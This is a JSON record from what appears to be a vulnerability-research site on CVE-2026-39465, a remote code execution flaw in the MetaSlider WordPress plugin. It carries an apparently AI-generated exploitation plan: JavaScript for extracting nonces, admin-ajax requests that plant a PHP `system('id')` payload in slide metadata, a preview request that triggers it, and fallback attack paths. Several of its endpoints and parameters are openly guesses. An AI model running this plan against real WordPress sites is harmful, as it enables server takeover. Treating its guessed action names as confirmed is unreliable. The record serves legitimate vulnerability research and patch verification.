[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2u8k3tZC_AyOiSYLNPi8JpGahl9wGLy6jG5uZIK-ok0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-39465","slider-gallery-and-carousel-by-metaslider-image-slider-video-slider-authenticated-editor-remote-code-execution","Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider \u003C= 3.106.0 - Authenticated (Editor+) Remote Code Execution","The Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.106.0. This makes it possible for authenticated attackers, with Editor-level access and above, to execute code on the server.","ml-slider",null,"\u003C=3.106.0","3.107.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-04-20 00:00:00","2026-04-30 15:39:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0d012f97-9ccb-4ff6-a24a-df3c10bacc63?source=api-prod",11,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fadmin.css","admin\u002Fassets\u002Fdist\u002Fcss\u002Fadmin.css","admin\u002Fassets\u002Fdist\u002Fjs\u002Fadmin.js","admin\u002Fassets\u002Fdist\u002Fjs\u002Fapp.js","admin\u002Fassets\u002Fdist\u002Fjs\u002Fapp.min.js","admin\u002Fassets\u002Fjs\u002Fadmin.js","admin\u002Fassets\u002Fjs\u002Fapp\u002Fsettings\u002Fpages\u002FExport.vue","admin\u002Fassets\u002Fjs\u002Fapp\u002Fslideshows\u002FSlideshow.vue","researched",false,3,"# Research Plan: CVE-2026-39465 - MetaSlider Authenticated RCE\n\n## 1. Vulnerability Summary\n**CVE-2026-39465** is a Remote Code Execution (RCE) vulnerability in the **MetaSlider** plugin (\u003C= 3.106.0) affecting the `ml-slider` component. The vulnerability exists due to improper sanitization and control of slide metadata, specifically the \"markup\" or \"template\" fields used in certain slide types like **Post Feed** or **External** slides. An attacker with Editor-level permissions can inject PHP code into these metadata fields. When the slideshow is rendered (e.g., in a preview or on a public page), the plugin processes this markup on the server, leading to code execution.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (AJAX) or the REST API `\u002Fwp-json\u002Fmetaslider\u002Fv1\u002F`.\n- **Action:** `ms_save_slides` (inferred for saving slide meta) or `create_image_slide`.\n- **Vulnerable Parameter:** `slides[ID][meta][ml-slider_markup]` or similar metadata keys associated with slide rendering.\n- **Authentication:** Authenticated, Editor or higher.\n- **Preconditions:** The attacker must be able to create or edit a slideshow.\n\n## 3. Code Flow\n1.  **Entry Point (Client):** The `Slideshow.vue` component calls `this.saveSlides(slides)` which sends an AJAX\u002FREST request to save slide data.\n2.  **Entry Point (Server):** The server-side handler for slide saving (e.g., `MetaSlider_Slide->save_data()`) receives the `meta` array.\n3.  **Data Persistence:** The malicious payload `\u003C?php system('id'); ?>` is saved into the `wp_postmeta` table for the specific slide (post type `ml-slide`).\n4.  **Execution Trigger:** When an Editor clicks \"Preview\" (`action=metaslider_preview`) or a page with the slider is viewed, the `MetaSlider_Slideshow->render()` method is called.\n5.  **Sink:** For **Post Feed** slides, the plugin retrieves the `ml-slider_markup` meta value and processes it. If the rendering engine uses `eval()` or an insecure template implementation, the PHP code is executed.\n\n## 4. Nonce Acquisition Strategy\nThe `admin\u002Fassets\u002Fdist\u002Fjs\u002Fadmin.js` file indicates several nonces are localized into the `metaslider` global object.\n\n### Extraction Steps:\n1.  **Login** as an Editor.\n2.  **Navigate** to the MetaSlider dashboard: `wp-admin\u002Fadmin.php?page=metaslider`.\n3.  **Execute JavaScript** to extract the nonces:\n    ```javascript\n    \u002F\u002F Primary nonces for slide operations\n    const nonces = {\n        create: window.metaslider?.create_slide_nonce,\n        update: window.metaslider?.update_slide_image_nonce,\n        duplicate: window.metaslider?.duplicate_slide_nonce,\n        save: window.metaslider?.save_nonce \u002F\u002F Inferred key for saving settings\u002Fslides\n    };\n    return nonces;\n    ```\n4.  If the specific `save_nonce` is missing, the `create_slide_nonce` is often used for broad slide management in this plugin.\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Base Slideshow\nCreate a slideshow and an initial image slide to obtain necessary IDs.\n- **Request:**\n    - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method:** `POST`\n    - **Body (URL-encoded):**\n        - `action`: `create_image_slide`\n        - `slider_id`: `` (empty for new slider)\n        - `selection[]`: `[ATTACHMENT_ID]` (Must have an image ID from Media Library)\n        - `_wpnonce`: `[create_slide_nonce]`\n\n### Step 2: Extract IDs\nThe response will contain the `slider_id` and the `slide_id`.\n- **Expected Response:** `{\"success\": true, \"data\": [{\"slide_id\": 123, \"html\": \"...\"}]}`\n\n### Step 3: Inject RCE Payload\nModify the slide to a \"Post Feed\" type and inject the PHP payload into the markup.\n- **Request:**\n    - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method:** `POST`\n    - **Body (URL-encoded):**\n        - `action`: `ms_save_slides` (or `metaslider_save_slides`)\n        - `_wpnonce`: `[save_nonce]`\n        - `slides[123][meta][ml-slider_type]`: `post_feed`\n        - `slides[123][meta][ml-slider_markup]`: `\u003C?php system('id'); die; ?>`\n\n### Step 4: Trigger Execution\nRequest the preview of the slider to trigger the server-side rendering of the malicious markup.\n- **Request:**\n    - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php?action=metaslider_preview&id=[SLIDER_ID]`\n    - **Method:** `GET`\n\n## 6. Test Data Setup\n1.  **Create Editor User:** `wp user create attacker attacker@example.com --role=editor --user_pass=password`\n2.  **Upload Image:** `wp media import \u002Fpath\u002Fto\u002Ftest-image.jpg` (needed for `create_image_slide`).\n3.  **Identify Attachment ID:** Note the ID of the uploaded image (e.g., `5`).\n\n## 7. Expected Results\nA successful exploit will result in the `GET` request to `metaslider_preview` returning the output of the `id` command (e.g., `uid=33(www-data) ...`).\n\n## 8. Verification Steps\n1.  **Check Meta:** Verify the payload was saved:\n    `wp post meta get [SLIDE_ID] ml-slider_markup`\n2.  **Process List:** Check for any suspicious processes spawned during the preview request.\n\n## 9. Alternative Approaches\nIf `ms_save_slides` fails:\n- **REST API Path:** Use `POST \u002Fwp-json\u002Fmetaslider\u002Fv1\u002Fslides\u002Fsave` with the same payload structure.\n- **External Slide Type:** Try `ml-slider_type=external` and look for a `content` or `url` field that might be evaluated.\n- **Slider Settings:** Target the `settings[html]` or `settings[custom_css]` fields in `action=ms_save_settings`. MetaSlider sometimes processes CSS through a server-side parser that might be vulnerable.","gemini-3-flash-preview","2026-05-04 19:35:10","2026-05-04 19:36:06",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.106.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fml-slider\u002Ftags\u002F3.106.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fml-slider.3.106.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fml-slider\u002Ftags\u002F3.107.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fml-slider.3.107.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fml-slider\u002Ftags"]